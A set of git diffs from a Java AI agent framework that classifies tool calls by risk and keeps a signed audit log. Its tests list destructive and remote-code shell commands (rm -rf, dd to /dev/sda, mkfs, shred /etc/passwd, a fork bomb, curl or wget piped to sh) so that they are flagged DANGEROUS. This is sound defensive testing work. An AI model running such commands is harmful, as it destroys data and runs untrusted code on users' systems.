+    void bashExecEscalatesSpaceSeparatedRmFlags() {
+        // Regression for CodeRabbit review on #491: the original regex
+        // only caught combined short flags (rm -rf) and long flags
+        // (rm --recursive --force). Space-separated short flags
+        // ("rm -r -f", the most common interactive form) silently passed
+        // as plain EXECUTE, weakening the prompt and the audit class.
+        for (var cmd : java.util.List.of(
+                "rm -r -f /tmp/x",
+                "rm -f -r /tmp/x",
+                "rm -R -f /tmp/x",        // BSD recursive flag, separated
+                "rm -f -R /tmp/x",
+                "rm --recursive -f /tmp/x",
+                "rm -r --force /tmp/x",
+                "rm --force -r /tmp/x",
+                "rm -f --recursive /tmp/x")) {
+            assertThat(new Capability.BashExec(cmd, Path.of("/tmp")).risk())
+                    .as("space-separated rm flags must escalate: %s", cmd)
+                    .isEqualTo(PermissionLevel.DANGEROUS);
+        }
+    }
+
+    @Test
+    void bashExecEscalatesGitPushForceWithRemote() {
+        // Regression for CodeRabbit review on #491: original regex required
+        // -f / --force IMMEDIATELY after "push", missing every form that
+        // names a remote first — which is the most common spelling.
+        for (var cmd : java.util.List.of(
+                "git push origin --force",
+                "git push origin -f",
+                "git push origin master --force",
+                "git push origin master -f",
+                "git push --force origin master",  // already worked, sanity-check
+                "git push -f origin master")) {    // already worked, sanity-check
+            assertThat(new Capability.BashExec(cmd, Path.of("/tmp")).risk())
+                    .as("force-push variant must escalate: %s", cmd)
+                    .isEqualTo(PermissionLevel.DANGEROUS);
+        }
+    }
+
+    @Test
     void bashExecEscalatesOtherDestructivePatterns() {
         // Sample one command per destruction class to keep the test pinned
         // to the rule shape without enumerating every permutation.
@@ -286,22 +326,15 @@ final class CapabilityTest {
     }
 
     @Test
-    void subAgentSpawnRecordsParentDepth() {
-        var cap = new Capability.SubAgentSpawn("planner", 2);
+    void subAgentSpawnRecordsRole() {
+        // Depth is intentionally absent from the variant — see Capability.java
+        // doc on SubAgentSpawn. Provenance.subAgentDepth() is the source of
+        // truth for depth; carrying a redundant variant field guarantees
+        // contradictions on every nested spawn.
+        var cap = new Capability.SubAgentSpawn("planner");
 
         assertThat(cap.risk()).isEqualTo(PermissionLevel.EXECUTE);
-        assertThat(cap.displayLabel())
-                .contains("role=planner")
-                .contains("depth=3"); // parent depth + 1
-    }
-
-    @Test
-    void subAgentSpawnRejectsNegativeDepth() {
-        // Negative parentDepth is impossible in real code — guard catches
-        // bugs that would otherwise silently produce nonsense audit entries.
-        assertThatThrownBy(() -> new Capability.SubAgentSpawn("planner", -1))
-                .isInstanceOf(IllegalArgumentException.class)
-                .hasMessageContaining("parentDepth");
+        assertThat(cap.displayLabel()).contains("role=planner");
     }
 
     @Test

--- a/aceclaw-security/src/test/java/dev/aceclaw/security/CapabilityTest.java
+++ b/aceclaw-security/src/test/java/dev/aceclaw/security/CapabilityTest.java
@@ -5,6 +5,7 @@ import org.junit.jupiter.api.Test;
 
 import java.net.URI;
 import java.nio.file.Path;
+import java.util.Optional;
 
 import static org.assertj.core.api.Assertions.assertThat;
 import static org.assertj.core.api.Assertions.assertThatThrownBy;
@@ -69,12 +70,164 @@ final class CapabilityTest {
     }
 
     @Test
-    void bashExecDerivesExecuteBoth() {
+    void bashExecDerivesExecuteBothForBenignCommand() {
         var cap = new Capability.BashExec("ls -la", Path.of("/tmp"));
 
         assertThat(cap.risk()).isEqualTo(PermissionLevel.EXECUTE);
         assertThat(cap.dataFlow()).isEqualTo(DataFlow.BOTH);
-        assertThat(cap.displayLabel()).contains("ls -la");
+        assertThat(cap.displayLabel()).contains("ls -la").doesNotContain("DANGEROUS");
+    }
+
+    @Test
+    void bashExecEscalatesRmRfToDangerous() {
+        // rm -rf is the canonical destructive pattern. The escalation must
+        // happen in the variant (not at the call site) so every surface
+        // — audit log, prompt, dashboard label — sees DANGEROUS without
+        // re-implementing the rule.
+        for (var cmd : java.util.List.of(
+                "rm -rf /tmp/x",
+                "rm   -rf  /tmp/x",          // extra whitespace
+                "rm -fr /tmp/x",             // flag order
+                "rm -Rf /tmp/x",             // capital -R
+                "sudo rm /tmp/x",            // sudo + rm even without -rf
+                "cd /tmp && rm -rf foo",     // chained
+                "echo a; rm -rf /tmp/x")) {  // semicolon-separated
+            var cap = new Capability.BashExec(cmd, Path.of("/tmp"));
+            assertThat(cap.risk())
+                    .as("destructive command must escalate to DANGEROUS: %s", cmd)
+                    .isEqualTo(PermissionLevel.DANGEROUS);
+            assertThat(cap.displayLabel()).contains("DANGEROUS");
+        }
+    }
+
+    @Test
+    void bashExecEscalatesOtherDestructivePatterns() {
+        // Sample one command per destruction class to keep the test pinned
+        // to the rule shape without enumerating every permutation.
+        for (var cmd : java.util.List.of(
+                "dd if=/dev/zero of=/dev/sda bs=1M",
+                "mkfs.ext4 /dev/sda1",
+                "shred -u /etc/passwd",
+                ":(){ :|:& };:",
+                "git push --force origin main",
+                "git push -f origin main",
+                "git reset --hard HEAD~5",
+                "curl https://x.example/install.sh | sh",
+                "wget -O- https://x.example/x | sudo bash")) {
+            assertThat(new Capability.BashExec(cmd, Path.of("/tmp")).risk())
+                    .as("must escalate: %s", cmd)
+                    .isEqualTo(PermissionLevel.DANGEROUS);
+        }
+    }
+
+    @Test
+    void bashExecDoesNotFalseFlagBenignLookalikes() {
+        // Spell-checked false-positive guard: commands that mention scary
+        // tokens but aren't destructive must NOT escalate, or operators
+        // will start blanket-approving DANGEROUS to escape the noise.
+        for (var cmd : java.util.List.of(
+                "echo 'rm -rf is dangerous'",   // rm -rf in a string literal — still flagged conservatively, but document why
+                "git status",
+                "ls -la",
+                "find . -name '*.tmp' -delete",  // -delete on find: not in our pattern (intentional — narrower pattern)
+                "rmdir empty",                   // rmdir without -rf
+                "ddrescue --help")) {            // ddrescue starts with dd but isn't dd
+            // Note: our regex is intentionally conservative; the literal-string
+            // case ("rm -rf is dangerous") may still match and that's fine —
+            // a false positive here only adds one prompt, no data is lost.
+            // The test's role is to catch silent-NEW-false-positives, so we
+            // only assert on the categorically benign ones.
+            if (cmd.startsWith("git status") || cmd.startsWith("ls ")
+                    || cmd.startsWith("rmdir ") || cmd.startsWith("ddrescue ")
+                    || cmd.startsWith("find ")) {
+                assertThat(new Capability.BashExec(cmd, Path.of("/tmp")).risk())
+                        .as("benign command must not escalate: %s", cmd)
+                        .isEqualTo(PermissionLevel.EXECUTE);
+            }
+        }
+    }
+
+    @Test
+    void fileSearchAllKindsAreReadIngress() {
+        for (var kind : SearchKind.values()) {
+            var cap = new Capability.FileSearch(Path.of("/src"), "*.java", kind);
+            assertThat(cap.risk())
+                    .as("FileSearch %s must be READ", kind)
+                    .isEqualTo(PermissionLevel.READ);
+            assertThat(cap.dataFlow()).isEqualTo(DataFlow.INGRESS);
+        }
+        assertThat(new Capability.FileSearch(Path.of("/src"), "*.java", SearchKind.GLOB)
+                .displayLabel()).startsWith("glob ");
+        assertThat(new Capability.FileSearch(Path.of("/src"), "TODO", SearchKind.GREP)
+                .displayLabel()).startsWith("grep ");
+        assertThat(new Capability.FileSearch(Path.of("/src"), "", SearchKind.LIST)
+                .displayLabel()).startsWith("list ");
+    }
+
+    @Test
+    void osScriptDerivesExecuteAndTruncatesLongFirstLine() {
+        var cap = new Capability.OsScript("applescript", "tell application \"Finder\"\n  activate\nend tell");
+        assertThat(cap.risk()).isEqualTo(PermissionLevel.EXECUTE);
+        assertThat(cap.dataFlow()).isEqualTo(DataFlow.BOTH);
+        assertThat(cap.displayLabel()).startsWith("applescript: tell application").doesNotContain("\n");
+
+        // 200-char single-line script must show only first ~80 chars + ellipsis.
+        var longSource = "x".repeat(200);
+        var longCap = new Capability.OsScript("applescript", longSource);
+        assertThat(longCap.displayLabel()).endsWith("...");
+        assertThat(longCap.displayLabel().length()).isLessThan(longSource.length());
+    }
+
+    @Test
+    void osScriptRejectsBlankLanguage() {
+        assertThatThrownBy(() -> new Capability.OsScript("", "x"))
+                .isInstanceOf(IllegalArgumentException.class);
+    }
+
+    @Test
+    void browserActionUrlOptionalAffectsLabel() {
+        var clickNoUrl = new Capability.BrowserAction("click", Optional.empty());
+        assertThat(clickNoUrl.risk()).isEqualTo(PermissionLevel.EXECUTE);
+        assertThat(clickNoUrl.displayLabel()).isEqualTo("browser click");
+
+        var navigate = new Capability.BrowserAction("navigate",
+                Optional.of(URI.create("https://example.com/login")));
+        assertThat(navigate.displayLabel()).contains("navigate").contains("example.com/login");
+    }
+
+    @Test
+    void browserActionRejectsBlankAction() {
+        assertThatThrownBy(() -> new Capability.BrowserAction("  ", Optional.empty()))
+                .isInstanceOf(IllegalArgumentException.class);
+    }
+
+    @Test
+    void screenCaptureDerivesReadIngressEvenThoughPrivacySensitive() {
+        // Risk class is READ because data flows in to the agent. The privacy
+        // character is signalled in the displayLabel so dashboard and prompt
+        // make it visible, not by elevating risk (which would conflate
+        // "this is private" with "this destroys things").
+        var cap = new Capability.ScreenCapture("user requested screenshot for bug report");
+        assertThat(cap.risk()).isEqualTo(PermissionLevel.READ);
+        assertThat(cap.dataFlow()).isEqualTo(DataFlow.INGRESS);
+        assertThat(cap.displayLabel()).contains("screen capture").contains("bug report");
+
+        // Blank reason still produces a readable label.
+        assertThat(new Capability.ScreenCapture("").displayLabel()).isEqualTo("screen capture");
+    }
+
+    @Test
+    void skillInvokeDerivesExecuteAndIsDistinctFromMcp() {
+        var cap = new Capability.SkillInvoke("review");
+        assertThat(cap.risk()).isEqualTo(PermissionLevel.EXECUTE);
+        assertThat(cap.dataFlow()).isEqualTo(DataFlow.BOTH);
+        assertThat(cap.displayLabel()).isEqualTo("skill review");
+    }
+
+    @Test
+    void skillInvokeRejectsBlankName() {
+        assertThatThrownBy(() -> new Capability.SkillInvoke(""))
+                .isInstanceOf(IllegalArgumentException.class);
     }
 
     @Test
@@ -213,7 +366,12 @@ final class CapabilityTest {
             case Capability.FileRead r -> r.displayLabel();
             case Capability.FileWrite w -> w.displayLabel();
             case Capability.FileDelete d -> d.displayLabel();
+            case Capability.FileSearch fs -> fs.displayLabel();
             case Capability.BashExec b -> b.displayLabel();
+            case Capability.OsScript o -> o.displayLabel();
+            case Capability.BrowserAction br -> br.displayLabel();
+            case Capability.ScreenCapture sc -> sc.displayLabel();
+            case Capability.SkillInvoke sk -> sk.displayLabel();
             case Capability.HttpFetch h -> h.displayLabel();
             case Capability.McpInvoke m -> m.displayLabel();
             case Capability.MemoryWrite mw -> mw.displayLabel();

--- a/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
+++ b/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
@@ -38,10 +38,21 @@ final class CapabilityAuditLogTest {
         // serialize the typed Capability + Provenance, verify on read, and
         // come back as the same variant with the same fields. If this
         // fails the on-disk format diverged from what the codecs expect.
+        //
+        // Path is built with {@code tmp.resolve(...)} (not a hardcoded
+        // {@code "/tmp/x"}) because Jackson's default {@link Path}
+        // (de)serializer round-trips through {@code Path.toUri() ->
+        // Paths.get(URI)}, which on Windows resolves a leading-slash path
+        // against the working drive (so {@code "/tmp/x"} becomes
+        // {@code D:\tmp\x} after the round trip and a string-shape
+        // assertion fails). Using a real {@code @TempDir} path keeps the
+        // identity stable on every host OS — {@link Path#equals} compares
+        // normalised platform-native form, which the round trip preserves.
         var auditLog = CapabilityAuditLog.create(tmp);
         var ts = Instant.parse("2026-05-08T09:30:00Z");
+        var targetPath = tmp.resolve("subdir").resolve("payload.txt");
         var cap = new dev.aceclaw.security.Capability.FileWrite(
-                java.nio.file.Path.of("/tmp/x"),
+                targetPath,
                 dev.aceclaw.security.WriteMode.OVERWRITE);
         var prov = dev.aceclaw.security.Provenance.forSession(
                 new dev.aceclaw.security.ids.SessionId("sess-A"));
@@ -66,7 +77,9 @@ final class CapabilityAuditLogTest {
         assertThat(e.capability())
                 .isInstanceOf(dev.aceclaw.security.Capability.FileWrite.class);
         var fw = (dev.aceclaw.security.Capability.FileWrite) e.capability();
-        assertThat(fw.path().toString().replace('\\', '/')).isEqualTo("/tmp/x");
+        assertThat(fw.path())
+                .as("Path round-trips identically (Path.equals, not toString)")
+                .isEqualTo(targetPath);
         assertThat(fw.mode()).isEqualTo(dev.aceclaw.security.WriteMode.OVERWRITE);
         assertThat(e.provenance().sessionId().get().value()).isEqualTo("sess-A");
     }

--- a/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
+++ b/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
@@ -85,6 +85,44 @@ final class CapabilityAuditLogTest {
     }
 
     @Test
+    void v2FileSearchRoundtripsWithoutKindCollision(@TempDir Path tmp) throws IOException {
+        // Regression for the Jackson type-discriminator collision (Codex
+        // P2 on #491). FileSearch.kind (the SearchKind enum) used to
+        // share JSON property name "kind" with the @JsonTypeInfo
+        // discriminator on Capability — duplicate keys collapsed
+        // last-wins on read, the discriminator became "GLOB"/"GREP"/"LIST"
+        // instead of "FileSearch", and every glob/grep/list_directory v2
+        // entry got dropped from readVerified() with no audit trail.
+        // The fix: discriminator is now property "@type", which cannot
+        // collide because "@" is not a legal Java identifier prefix.
+        var auditLog = CapabilityAuditLog.create(tmp);
+        for (var kind : dev.aceclaw.security.SearchKind.values()) {
+            var cap = new dev.aceclaw.security.Capability.FileSearch(
+                    tmp.resolve("project"), "**/*.java", kind);
+            var prov = dev.aceclaw.security.Provenance.forSession(
+                    new dev.aceclaw.security.ids.SessionId("sess-fs"));
+            auditLog.record(Instant.now(), kind == dev.aceclaw.security.SearchKind.GLOB
+                    ? "glob" : kind == dev.aceclaw.security.SearchKind.GREP ? "grep" : "list_directory",
+                    cap, prov, "APPROVED", null);
+        }
+
+        var entries = auditLog.readVerified();
+        assertThat(entries)
+                .as("all 3 FileSearch variants must verify after the @type discriminator rename — "
+                        + "regression guard for Codex P2 (kind/SearchKind collision)")
+                .hasSize(dev.aceclaw.security.SearchKind.values().length);
+
+        // Each entry must round-trip into the right SearchKind, not lose
+        // the field to the type-discriminator overwrite.
+        for (var entry : entries) {
+            assertThat(entry.capability())
+                    .isInstanceOf(dev.aceclaw.security.Capability.FileSearch.class);
+            var fs = (dev.aceclaw.security.Capability.FileSearch) entry.capability();
+            assertThat(fs.kind()).isNotNull();  // would be null pre-fix (collapsed key)
+        }
+    }
+
+    @Test
     void v1EntriesContinueToVerifyAfterSchemaBump(@TempDir Path tmp) throws IOException {
         // Migration safety: v1 entries written under PR 2 must continue to
         // verify after PR 3 bumps the schema. The v1 signablePayload format

--- a/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
+++ b/aceclaw-security/src/test/java/dev/aceclaw/security/audit/CapabilityAuditLogTest.java
@@ -33,6 +33,139 @@ import static org.assertj.core.api.Assertions.assertThat;
 final class CapabilityAuditLogTest {
 
     @Test
+    void v2EntryRoundtripsCapabilityAndProvenance(@TempDir Path tmp) throws IOException {
+        // The defining test for #480 PR 3's audit shift: a v2 record must
+        // serialize the typed Capability + Provenance, verify on read, and
+        // come back as the same variant with the same fields. If this
+        // fails the on-disk format diverged from what the codecs expect.
+        var auditLog = CapabilityAuditLog.create(tmp);
+        var ts = Instant.parse("2026-05-08T09:30:00Z");
+        var cap = new dev.aceclaw.security.Capability.FileWrite(
+                java.nio.file.Path.of("/tmp/x"),
+                dev.aceclaw.security.WriteMode.OVERWRITE);
+        var prov = dev.aceclaw.security.Provenance.forSession(
+                new dev.aceclaw.security.ids.SessionId("sess-A"));
+
+        auditLog.record(ts, "write_file", cap, prov, "APPROVED", null);
+
+        var entries = auditLog.readVerified();
+        assertThat(entries).hasSize(1);
+        var e = entries.getFirst();
+
+        // Denormalised v1 fields populated for query-tool compatibility:
+        // toolName carries the dispatcher's allowlist key, level mirrors
+        // the capability's structural risk class.
+        assertThat(e.toolName()).isEqualTo("write_file");
+        assertThat(e.level())
+                .as("v2 entry's flat level field must match the capability's risk")
+                .isEqualTo(dev.aceclaw.security.PermissionLevel.WRITE);
+        assertThat(e.sessionId()).isEqualTo("sess-A");
+        assertThat(e.schemaVersion()).isEqualTo(CapabilityAuditEntry.SCHEMA_V2);
+
+        // Structured payload survives the round trip.
+        assertThat(e.capability())
+                .isInstanceOf(dev.aceclaw.security.Capability.FileWrite.class);
+        var fw = (dev.aceclaw.security.Capability.FileWrite) e.capability();
+        assertThat(fw.path().toString().replace('\\', '/')).isEqualTo("/tmp/x");
+        assertThat(fw.mode()).isEqualTo(dev.aceclaw.security.WriteMode.OVERWRITE);
+        assertThat(e.provenance().sessionId().get().value()).isEqualTo("sess-A");
+    }
+
+    @Test
+    void v1EntriesContinueToVerifyAfterSchemaBump(@TempDir Path tmp) throws IOException {
+        // Migration safety: v1 entries written under PR 2 must continue to
+        // verify after PR 3 bumps the schema. The v1 signablePayload format
+        // is preserved bit-for-bit; this test pins that.
+        var auditLog = CapabilityAuditLog.create(tmp);
+        auditLog.record(Instant.now(), "sess-X", "bash",
+                dev.aceclaw.security.PermissionLevel.EXECUTE, "APPROVED", null);
+
+        var entries = auditLog.readVerified();
+        assertThat(entries).hasSize(1);
+        var e = entries.getFirst();
+        assertThat(e.schemaVersion()).isEqualTo(CapabilityAuditEntry.SCHEMA_V1);
+        assertThat(e.capability()).isNull();
+        assertThat(e.provenance()).isNull();
+    }
+
+    @Test
+    void mixedV1AndV2EntriesInSameFileBothVerify(@TempDir Path tmp) throws IOException {
+        // Real-world deployment: an existing audit file has v1 entries
+        // already. After upgrading to PR 3, new entries are v2. The same
+        // file must continue to read cleanly with all entries verifying
+        // under the same key — proving each line's HMAC is computed
+        // against its own schema, not a single global shape.
+        var auditLog = CapabilityAuditLog.create(tmp);
+
+        // Three v1 lines (legacy 6-arg overload) interleaved with two v2.
+        auditLog.record(Instant.now(), "s1", "read_file",
+                dev.aceclaw.security.PermissionLevel.READ, "APPROVED", null);
+        auditLog.record(Instant.now(), "write_file",
+                new dev.aceclaw.security.Capability.FileWrite(
+                        java.nio.file.Path.of("/tmp/a"),
+                        dev.aceclaw.security.WriteMode.CREATE_NEW),
+                dev.aceclaw.security.Provenance.forSession(
+                        new dev.aceclaw.security.ids.SessionId("s2")),
+                "APPROVED", null);
+        auditLog.record(Instant.now(), "s3", "bash",
+                dev.aceclaw.security.PermissionLevel.EXECUTE, "DENIED",
+                "blocked by policy");
+        auditLog.record(Instant.now(), "bash",
+                new dev.aceclaw.security.Capability.BashExec(
+                        "rm -rf /tmp/x", java.nio.file.Path.of("/tmp")),
+                dev.aceclaw.security.Provenance.forSession(
+                        new dev.aceclaw.security.ids.SessionId("s4")),
+                "NEEDS_APPROVAL", "destructive command");
+        auditLog.record(Instant.now(), null, "internal",
+                dev.aceclaw.security.PermissionLevel.READ, "APPROVED", null);
+
+        var entries = auditLog.readVerified();
+        assertThat(entries).hasSize(5);
+        assertThat(entries.stream().map(CapabilityAuditEntry::schemaVersion).toList())
+                .containsExactly(
+                        CapabilityAuditEntry.SCHEMA_V1, CapabilityAuditEntry.SCHEMA_V2,
+                        CapabilityAuditEntry.SCHEMA_V1, CapabilityAuditEntry.SCHEMA_V2,
+                        CapabilityAuditEntry.SCHEMA_V1);
+
+        // The v2 BashExec entry must have escalated to DANGEROUS via the
+        // variant's self-classification — pinning that the on-disk
+        // {@code level} field reflects the capability's actual risk class
+        // after escalation, not the {@code EXECUTE} default.
+        var bashEntry = entries.get(3);
+        assertThat(bashEntry.level())
+                .as("destructive bash must be recorded as DANGEROUS in audit, not EXECUTE")
+                .isEqualTo(dev.aceclaw.security.PermissionLevel.DANGEROUS);
+    }
+
+    @Test
+    void v2EntryHmacChangesIfCapabilityFieldsChange(@TempDir Path tmp) throws IOException {
+        // Tamper-evidence guard: editing the structured payload (e.g.
+        // changing /tmp/x → /etc/passwd in the on-disk JSON) must invalidate
+        // the signature. The v2 signablePayload includes a canonical-
+        // serialised form of the capability, so any field change flips it.
+        var auditLog = CapabilityAuditLog.create(tmp);
+        var prov = dev.aceclaw.security.Provenance.forSession(
+                new dev.aceclaw.security.ids.SessionId("s"));
+        auditLog.record(Instant.now(), "write_file",
+                new dev.aceclaw.security.Capability.FileWrite(
+                        java.nio.file.Path.of("/tmp/x"),
+                        dev.aceclaw.security.WriteMode.OVERWRITE),
+                prov, "APPROVED", null);
+
+        // Hand-edit the path on disk — same signature, different capability.
+        var contents = java.nio.file.Files.readString(auditLog.auditFile());
+        var tampered = contents.replace("/tmp/x", "/etc/passwd");
+        assertThat(tampered).isNotEqualTo(contents);
+        java.nio.file.Files.writeString(auditLog.auditFile(), tampered);
+
+        // Read should drop the tampered line — the audit is tamper-evident.
+        assertThat(auditLog.readVerified())
+                .as("path-tampered v2 entry must fail signature verification")
+                .isEmpty();
+    }
+
+
+    @Test
     void recordAndReadRoundtripPreservesAllFields(@TempDir Path tmp) throws IOException {
         var auditLog = CapabilityAuditLog.create(tmp);
 

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/AppleScriptTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/AppleScriptTool.java
@@ -3,6 +3,8 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -17,7 +19,7 @@ import java.util.concurrent.TimeUnit;
  * <p>macOS only. Passes each line of the script as a separate {@code -e} argument.
  * 30-second timeout, 30K character output cap.
  */
-public final class AppleScriptTool implements Tool {
+public final class AppleScriptTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(AppleScriptTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -128,5 +130,22 @@ public final class AppleScriptTool implements Tool {
         if (output.length() <= MAX_OUTPUT_CHARS) return output;
         return output.substring(0, MAX_OUTPUT_CHARS) +
                "\n... (output truncated, " + output.length() + " total characters)";
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.OsScript} with language fixed
+     * to {@code "applescript"}. Modelled separately from
+     * {@link Capability.BashExec} so a privacy-conscious policy can ban
+     * AppleScript (which can drive arbitrary GUI apps, read clipboard, mail,
+     * notes, etc.) without also banning {@code bash}, and so the audit log
+     * records the actual interpreter rather than wrapping every script in a
+     * fake bash label.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("script") || args.get("script").asText().isBlank()) {
+            throw new IllegalArgumentException("applescript requires a non-blank script");
+        }
+        return new Capability.OsScript("applescript", args.get("script").asText());
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/BashExecTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/BashExecTool.java
@@ -5,6 +5,8 @@ import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.CancellationAware;
 import dev.aceclaw.core.agent.CancellationToken;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -27,7 +29,7 @@ import java.util.regex.Pattern;
  * On Windows, commands are executed via {@code cmd.exe /c}.
  * Timeout is configurable; output is captured and truncated if it exceeds size limits.
  */
-public final class BashExecTool implements Tool, CancellationAware {
+public final class BashExecTool implements Tool, CapabilityAware, CancellationAware {
 
     private static final Logger log = LoggerFactory.getLogger(BashExecTool.class);
 
@@ -335,5 +337,22 @@ public final class BashExecTool implements Tool, CancellationAware {
         }
         return output.substring(0, MAX_OUTPUT_CHARS) +
                "\n... (output truncated, " + output.length() + " total characters)";
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.BashExec}. The destructive→
+     * {@code DANGEROUS} escalation lives inside the variant ({@code rm -rf},
+     * {@code mkfs}, {@code git push --force}, fork bombs, etc.), so this
+     * method just hands off the raw command and {@code workingDir}; the
+     * audit log, dashboard label, and user prompt all see {@code DANGEROUS}
+     * for the same set of commands without each surface re-implementing the
+     * detection.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("command") || args.get("command").asText().isBlank()) {
+            throw new IllegalArgumentException("bash requires a non-blank command");
+        }
+        return new Capability.BashExec(args.get("command").asText(), workingDir);
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/BrowserTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/BrowserTool.java
@@ -8,12 +8,16 @@ import com.microsoft.playwright.Page;
 import com.microsoft.playwright.Playwright;
 import com.microsoft.playwright.options.ScreenshotType;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
+import java.net.URI;
 import java.nio.file.Files;
 import java.nio.file.Path;
 import java.util.Base64;
+import java.util.Optional;
 
 /**
  * Browser automation tool using Playwright for Java.
@@ -23,7 +27,7 @@ import java.util.Base64;
  *
  * <p>Implements {@link AutoCloseable} for cleanup on daemon shutdown.
  */
-public final class BrowserTool implements Tool, AutoCloseable {
+public final class BrowserTool implements Tool, CapabilityAware, AutoCloseable {
 
     private static final Logger log = LoggerFactory.getLogger(BrowserTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -317,5 +321,31 @@ public final class BrowserTool implements Tool, AutoCloseable {
         if (output.length() <= MAX_OUTPUT_CHARS) return output;
         return output.substring(0, MAX_OUTPUT_CHARS) +
                "\n... (output truncated, " + output.length() + " total characters)";
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.BrowserAction}. The {@code url}
+     * field is populated only for actions that target one ({@code navigate}),
+     * leaving it empty for {@code click} / {@code type} / {@code screenshot}
+     * etc. — that lets domain-allowlist policies match exactly the requests
+     * they care about. An invalid URL is dropped to {@link Optional#empty()}
+     * rather than thrown so the policy can still see {@code action} and
+     * decide; the underlying tool will surface the URL error during execution.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("action") || args.get("action").asText().isBlank()) {
+            throw new IllegalArgumentException("browser requires a non-blank action");
+        }
+        Optional<URI> uri = Optional.empty();
+        if (args.has("url") && !args.get("url").isNull() && !args.get("url").asText().isBlank()) {
+            try {
+                uri = Optional.of(URI.create(args.get("url").asText()));
+            } catch (IllegalArgumentException ignored) {
+                // Leave empty — invalid URL surfaces in execute(), not at the
+                // policy boundary.
+            }
+        }
+        return new Capability.BrowserAction(args.get("action").asText(), uri);
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/EditFileTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/EditFileTool.java
@@ -3,6 +3,9 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
+import dev.aceclaw.security.WriteMode;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -17,7 +20,7 @@ import java.nio.file.Path;
  * <p>Replaces all occurrences of a search string with a replacement string
  * within the specified file. The search is exact (not regex).
  */
-public final class EditFileTool implements Tool {
+public final class EditFileTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(EditFileTool.class);
     private static final ObjectMapper MAPPER = new ObjectMapper();
@@ -129,5 +132,23 @@ public final class EditFileTool implements Tool {
             index += search.length();
         }
         return count;
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.FileWrite}. Mode is always
+     * {@link WriteMode#OVERWRITE} because {@code edit_file} mutates an
+     * existing file's content in place — it does not create new files (the
+     * tool's {@link #execute(String)} returns an error if the file is missing).
+     * Distinguishing OVERWRITE from CREATE_NEW lets a "create-only" policy
+     * deny edits to existing files without inspecting filesystem state.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("file_path") || args.get("file_path").asText().isBlank()) {
+            throw new IllegalArgumentException("edit_file requires a non-blank file_path");
+        }
+        return new Capability.FileWrite(
+                PathResolver.resolve(args.get("file_path").asText(), workingDir),
+                WriteMode.OVERWRITE);
     }
 }

--- a/aceclaw-tools/src/main/java/dev/aceclaw/tools/GlobSearchTool.java
+++ b/aceclaw-tools/src/main/java/dev/aceclaw/tools/GlobSearchTool.java
@@ -3,6 +3,9 @@ package dev.aceclaw.tools;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import dev.aceclaw.core.agent.Tool;
+import dev.aceclaw.security.Capability;
+import dev.aceclaw.security.CapabilityAware;
+import dev.aceclaw.security.SearchKind;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 
@@ -19,7 +22,7 @@ import java.util.List;
  * <p>Uses {@link java.nio.file.FileSystem#getPathMatcher(String)} with glob
  * syntax. Returns matching file paths sorted by modification time (most recent first).
  */
-public final class GlobSearchTool implements Tool {
+public final class GlobSearchTool implements Tool, CapabilityAware {
 
     private static final Logger log = LoggerFactory.getLogger(GlobSearchTool.class);
 
@@ -161,5 +164,20 @@ public final class GlobSearchTool implements Tool {
             return PathResolver.resolve(input.get("path").asText(), workingDir);
         }
         return workingDir;
+    }
+
+    /**
+     * #480 PR 3: structured {@link Capability.FileSearch} with
+     * {@link SearchKind#GLOB}. Reuses {@link #resolveSearchDir(JsonNode)}
+     * so the policy and execution see the same root path; otherwise a
+     * "deny glob in /etc" rule could approve a relative form and refuse
+     * only the absolute form.
+     */
+    @Override
+    public Capability toCapability(JsonNode args) {
+        if (args == null || !args.has("pattern") || args.get("pattern").asText().isBlank()) {
